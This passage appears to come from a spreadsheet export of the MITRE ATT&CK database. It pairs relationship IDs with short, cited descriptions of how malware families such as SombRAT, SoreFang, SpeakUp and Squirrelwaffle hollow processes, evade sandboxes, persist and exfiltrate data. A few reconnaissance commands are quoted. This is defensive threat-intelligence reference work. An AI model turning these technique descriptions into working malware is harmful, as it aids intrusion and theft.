    <t>[Snip3](https://attack.mitre.org/software/S1086) has been executed through luring victims into clicking malicious links.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--6ebe95eb-909e-460e-b2ff-db0838e2f1e8</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can download and execute additional payloads and modules over separate communication channels.(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--8f060861-0206-4dcc-9f46-c55bde63ae40</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) has the ability to obfuscate strings using XOR encryption.(Citation: Morphisec Snip3 May 2021)</t>
  </si>
  <si>
    <t>relationship--3979ca39-09a1-4a2b-a7d3-2eca5f1fb166</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can use a PowerShell script for second-stage execution.(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--f5fcb813-4522-4846-8176-b630847269d9</t>
  </si>
  <si>
    <t xml:space="preserve">
[Snip3](https://attack.mitre.org/software/S1086) can use RunPE to execute malicious payloads within a hollowed Windows process.(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)
</t>
  </si>
  <si>
    <t>relationship--372642cf-1598-46a0-a791-2f6d2d2d8987</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can create a VBS file in startup to persist after system restarts.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--4d28e653-c023-45cf-bbbd-ade005bcd519</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) has been delivered to victims through malicious e-mail attachments.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--7d1c227c-25b9-4e8b-ad88-618d9f382420</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) has been delivered to victims through e-mail links to malicious files.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--b1ed7715-2145-4b26-b414-8f83a29e1f74</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) has the ability to detect Windows Sandbox, VMWare, or VirtualBox by querying `Win32_ComputerSystem` to extract the `Manufacturer` string.(Citation: Morphisec Snip3 May 2021)</t>
  </si>
  <si>
    <t>relationship--cbed7d53-5d5f-48ee-a2d0-ee10230d4e4c</t>
  </si>
  <si>
    <t xml:space="preserve">[Snip3](https://attack.mitre.org/software/S1086) has the ability to query `Win32_ComputerSystem` for system information. (Citation: Morphisec Snip3 May 2021) </t>
  </si>
  <si>
    <t>relationship--6deb7ae9-9e35-47cb-8db2-e708ad9543b6</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can execute `WScript.Sleep` to delay execution of its second stage.(Citation: Morphisec Snip3 May 2021)</t>
  </si>
  <si>
    <t>relationship--7f152b13-3aae-4c67-b8f3-391cac671aed</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can use visual basic scripts for first-stage execution.(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--20740afb-283e-4143-ab47-685d4c73beda</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can download additional payloads from web services including Pastebin and top4top.(Citation: Morphisec Snip3 May 2021)</t>
  </si>
  <si>
    <t>relationship--1b40e3b0-a862-4c79-a8e6-a008e71f6028</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can query the WMI class `Win32_ComputerSystem` to gather information.(Citation: Morphisec Snip3 May 2021)</t>
  </si>
  <si>
    <t>relationship--8a61202f-ec67-4ec2-8640-c148147731e0</t>
  </si>
  <si>
    <t>S0273</t>
  </si>
  <si>
    <t>Socksbot</t>
  </si>
  <si>
    <t>malware--e494ad79-37ee-4cd0-866b-299c521d8b94</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) creates a suspended svchost process and injects its DLL into it.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--3a0c38e8-c174-4c86-a229-fcb4965ce311</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can write and execute PowerShell scripts.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--749b0a26-fbf8-4858-a545-5faca77adead</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can list all running processes.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--eb6ecbe4-07fc-4c45-9da8-fab737e300c3</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can start SOCKS proxy threads.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--a13feeb0-d376-4460-8335-f86c0f163d4b</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) can take screenshots.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--bec2b0d9-b76e-4acb-a9a4-adebe4c854c0</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can use a hardcoded RSA key to encrypt some of its C2 traffic.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--20eb2a85-e9f0-41cc-a26a-d66989c476f8</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) has the ability to download additional payloads from C2 to the targeted system.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--035dca04-cf9e-45ac-a037-f171b06078e6</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can use &lt;code&gt;RegOpenKeyW&lt;/code&gt; to access the Registry.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--09254353-5452-4af7-8e7b-f297eff42a7f</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can use "stackstrings" for obfuscation.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--32035519-2c91-4fc2-a9c4-64c766510374</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can search a list of running processes.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--c9fa803b-3d37-49bc-b0b3-ec409ad372fa</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) has the ability to query the Registry to detect a key specific to VMware.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--e9a4e4bd-717a-4048-a623-4a1758b93acd</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can use RC4 to encrypt C2 communications.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--b947983f-2c0a-4082-b102-8f8497e2b045</t>
  </si>
  <si>
    <t xml:space="preserve">[SodaMaster](https://attack.mitre.org/software/S0627) can check for the presence of the Registry key &lt;code&gt;HKEY_CLASSES_ROOT\\Applications\\VMwareHostOpen.exe&lt;/code&gt; before proceeding to its main functionality.(Citation: Securelist APT10 March 2021)	 </t>
  </si>
  <si>
    <t>relationship--0e843db4-d4be-4252-85d0-7365dcbdbb50</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can enumerate the host name and OS version on a target system.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--695e51bb-e410-40b1-b8fc-d40734796729</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) can identify the username on a compromised host.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--4acb6288-8de5-4a5c-b7a4-68911ab148f9</t>
  </si>
  <si>
    <t>[SodaMaster](https://attack.mitre.org/software/S0627) has the ability to put itself to "sleep" for a specified time.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--2426fc7d-5d97-4563-9889-d079ed36b4cf</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has encrypted collected data with AES-256 using a hardcoded key.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--8b76353e-6ed6-4d20-b52d-ca7dde9dec9b</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can SSL encrypt C2 traffic.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--00192a5f-9dc0-445a-b010-d77bd08aac93</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can communicate over DNS with the C2 server.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--9bca83aa-4200-45a4-a978-1ccc75561d5e</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has collected data and files from a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--3a3ba187-fa84-4285-97e6-8a9383c5e66f</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can run &lt;code&gt;upload&lt;/code&gt; to decrypt and upload files from storage.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--21281614-d7cc-4211-9365-d318c99cb906</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can use a custom DGA to generate a subdomain for C2.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--c4674c67-09ca-4ac2-8166-1b61c6e863ef</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;loadfromfile&lt;/code&gt;, &lt;code&gt;loadfromstorage&lt;/code&gt;, and &lt;code&gt;loadfrommem&lt;/code&gt; to inject a DLL  from disk, storage, or memory respectively.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--d7aa491f-a801-4611-ad07-5096e12c5c5f</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has uploaded collected data and files from a compromised host to its C2 server.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--9afc4866-c607-4af6-bd71-eef0ab16c7b6</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</si>
  <si>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</si>
  <si>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relationship--50308104-5191-4e83-a78e-321126ea5eee</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;enum&lt;/code&gt; to enumerate files in storage on a compromised system.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--e260b882-0f57-4e44-b6fe-efaefccd1c3f</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to download and execute additional payloads.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--5e6f5555-f7dd-462d-b110-afc28f021be5</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can store harvested data in a custom database under the %TEMP% directory.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--a30e2e98-d6c2-4eb1-b520-1b6757c88c47</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can use a legitimate process name to hide itself.(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--f40170e7-5246-442e-95ad-1b810107b8b8</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to respawn itself using &lt;code&gt;ShellExecuteW&lt;/code&gt; and &lt;code&gt;CreateProcessW&lt;/code&gt;.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--3fe56134-1a77-4df2-af85-9a68042c5fb8</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to use TCP sockets to send data and ICMP to ping the C2 server.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--6b9778e3-14f7-4609-8621-d24e2a40c032</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</si>
  <si>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</si>
  <si>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relationship--4a79cc78-872f-49f0-80c5-20f1b2dcd9f2</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to modify its process memory to hide process command-line arguments.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--6e6fe0e8-fb0f-40b8-bb8c-4c6aba839618</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can use the &lt;code&gt;getprocesslist&lt;/code&gt; command to enumerate processes on a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--18c07e03-0456-4854-bf63-07eb6d6bd868</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has the ability to use an embedded SOCKS proxy in C2 communications.(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--1ab94260-498a-4090-85c9-54b89d8b6bb3</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) has encrypted its C2 communications with AES.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--90c3e922-1a21-4dc1-ad89-a72e013b5977</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;getinfo&lt;/code&gt; to enumerate the computer name and OS version of a compromised system.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--ff3ade9d-2665-4794-bb1e-cb436d790f3f</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;getinfo&lt;/code&gt;  to identify the username on a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--70bed654-4c16-456a-8691-4f2bf1c916cc</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can enumerate services on a victim machine.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>relationship--c8f99c96-d4f7-49dc-9ee9-0bcae28ab045</t>
  </si>
  <si>
    <t>[SombRAT](https://attack.mitre.org/software/S0615) can execute &lt;code&gt;getinfo&lt;/code&gt;  to discover the current time on a compromised host.(Citation: BlackBerry CostaRicto November 2020)(Citation: CISA AR21-126A FIVEHANDS May 2021)</t>
  </si>
  <si>
    <t>relationship--14e836d1-af9e-423e-8a8d-ad2ab169667f</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can decode and decrypt exfiltrated data sent to C2.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--ec218695-e481-4895-97a2-5383949cb04d</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain accounts via &lt;code&gt;net.exe user /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--0cf8d5da-a127-4b48-bbf9-e5a0376033b4</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain groups by executing &lt;code&gt;net.exe group /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--98737ffe-6b7b-4c2d-a775-7a93e304a9c7</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--61ee8aa7-89fc-4414-97f3-95fa9f1f26ad</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) has the ability to list directories.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--3dd2f874-57e3-4670-9c0a-7d8c35741bb6</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can download additional payloads from C2.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>relationship--0aebf9e4-9730-45ce-877d-f78432c13fad</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect usernames from the local system via &lt;code&gt;net.exe user&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--962d745e-7771-4c8b-a887-04d3a521943c</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) has the ability to encode and RC6 encrypt data sent to C2.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--c76875e8-006d-493b-880a-332faf28f3ca</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can enumerate processes on a victim machine through use of [Tasklist](https://attack.mitre.org/software/S0057).(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--1ed17f60-d6ca-4ef7-ae52-7a573c2a7ff3</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can gain persistence through use of scheduled tasks.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--6beb1553-aece-41eb-a1e7-dbe2738f23d6</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing [Systeminfo](https://attack.mitre.org/software/S0096).(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--75e01f6a-9f45-4db2-a79d-a21453b6d83f</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via &lt;code&gt;ipconfig.exe /all&lt;/code&gt;.(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>relationship--9c24c5c3-0aa3-4caa-b983-9739eb8c57eb</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) can use HTTP in C2 communications.(Citation: CISA SoreFang July 2016)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>relationship--4b9cbe06-8c1f-4596-ad87-fa19e60e8ec3</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used a custom XOR algorithm to decrypt the payload.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--b1a30826-465a-4342-8ceb-e0bd4ef50063</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has exfiltrated data over the C2 channel.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--d7ce8b92-ada4-4e8f-b073-5a497de7156a</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has been packed with Enigma Protector to obfuscate its contents.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--25df53ed-4a07-4e71-8a1b-a84a2571e043</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has encoded communications with the C2 server with base64.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--54e27824-ac46-49ca-8b58-dc5726b6cefb</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) can collect the hostname, keyboard layout, and language from the system.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--7f659555-cfc4-420f-8548-3a89aa1da8c9</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</si>
  <si>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</si>
  <si>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relationship--392980d3-6cac-4740-824c-4911ab10f135</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has run the whoami command and has a built-in command to identify the user logged in.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--98f55ec9-3170-41ad-9bac-c921fa4a29ea</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used a splash screen to check whether an user actively clicks on the screen before running malicious code.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--883a60f7-0111-4542-b590-2f0140ba26bd</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) has used HTTP POST requests to communicate with its C2 server to receive commands.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--ee98d9ef-4665-4da8-9b3c-95ff6924d8bf</t>
  </si>
  <si>
    <t xml:space="preserve">[Spark](https://attack.mitre.org/software/S0543) can use cmd.exe to run commands.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--52978273-355d-4043-b65e-a3e1d0b84b9e</t>
  </si>
  <si>
    <t>S0374</t>
  </si>
  <si>
    <t>SpeakUp</t>
  </si>
  <si>
    <t>malware--a5575606-9b85-4e3d-9cd2-40ef30e3672d</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses Perl scripts.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--9b174c9b-eab5-4715-aa31-915689054baa</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses cron tasks to ensure persistence. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--15e5ddeb-ad28-44c0-a7a7-0fe69e05456d</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</si>
  <si>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</si>
  <si>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relationship--8195cc4a-3415-49b9-9338-156b56ac0e30</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) deletes files to remove evidence on the machine. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--86fe5a45-f9b8-4606-ba91-344e55d69173</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) downloads and executes additional files from a remote server. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--1c3d2111-f234-4624-999e-ce902367c212</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) checks for availability of specific ports on servers.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--467f79d6-edf7-4e6a-a0d7-8196cd406ce1</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) encodes its second-stage payload with Base64. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--ca8af6f0-da6b-40c8-81cb-764e1df0fd0a</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--3222edc5-bed6-4e8f-b62b-d76040754218</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses Python scripts.(Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--2209a958-9359-4866-80e9-80d0cc660868</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) encodes C&amp;C communication using Base64. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--c035e54b-c504-4e4f-9915-c2f37236ef34</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;cat /proc/cpuinfo | grep -c “cpu family” 2&gt;&amp;1&lt;/code&gt; command to gather system information. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--0a8c04f1-c724-4215-92f0-3863b2a3d96d</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;ifconfig -a&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--74467d5d-5b28-4b91-9494-e421ddeabebe</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;arp -a&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--caa06b6c-b59e-4986-87f5-fdab9d9d3534</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses the &lt;code&gt;whoami&lt;/code&gt; command. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--375f92a4-13b2-4640-b192-c34eb2b91c9c</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) uses POST and GET requests over HTTP to communicate with its main C&amp;C server. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>relationship--71d95d1d-d519-44d8-9177-b01196cf8fe3</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has been signed with valid digital certificates.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--e162ad03-8170-4353-906e-0a294695f880</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has collected data and other information from a compromised host.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--60855df0-b2f5-46ed-ba9d-09bdfd7d1ac6</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can download malicious files from threat actor controlled AWS URL's.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--7f7f05aa-a246-48ce-89d2-48035cac5ffa</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has the ability to execute arbitrary JavaScript code on a compromised host.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--ab55f99b-5239-4aea-93f7-e1002520bf05</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has been executed through malicious links within spearphishing emails.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--b5372961-d931-497e-8043-1bfa446f65d6</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can identify payment systems, payment gateways, and ATM systems in compromised environments.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--b6609907-ec91-4339-a1ed-811bfe6ca48e</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can check for the presence of 29 different antivirus tools.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--e9449844-2092-4f7d-9d8f-1ba50060e171</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can enumerate running software on a targeted system.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--4859e904-e404-4bae-a106-d347c9cc2e18</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) has been distributed via emails containing a malicious link that appears to be a PDF document.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--50860aec-3490-4783-8ffb-ad4217cf0d58</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can identify the system name of a compromised host.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--44272fb3-a31d-4cea-b11c-b65e2bdcbd68</t>
  </si>
  <si>
    <t>[SpicyOmelette](https://attack.mitre.org/software/S0646) can identify the IP of a compromised system.(Citation: Secureworks GOLD KINGSWOOD September 2018)</t>
  </si>
  <si>
    <t>relationship--81d74373-fcaa-4089-9715-1550f012739d</t>
  </si>
  <si>
    <t>S1030</t>
  </si>
  <si>
    <t>Squirrelwaffle</t>
  </si>
  <si>
    <t>malware--3c18ad16-9eaf-4649-984e-68551bff0d47</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has encrypted collected data using a XOR-based algorithm.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--ca140f83-3fc6-44e8-b588-806fb60e7e7e</t>
  </si>
  <si>
    <t>26 August 2022</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has decrypted files and payloads using a XOR-based algorithm.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)</t>
  </si>
  <si>
    <t>relationship--39e0a84e-24de-4b0f-a0e4-3a821b8f963a</t>
  </si>
  <si>
    <t>[Squirrelwaffle](https://attack.mitre.org/software/S1030) has exfiltrated victim data using HTTP POST requests to its C2 servers.(Citation: ZScaler Squirrelwaffle Sep 2021)</t>
  </si>
  <si>
    <t>relationship--246b5a38-8569-4145-af9a-0078f398e1d1</t>
  </si>
  <si>
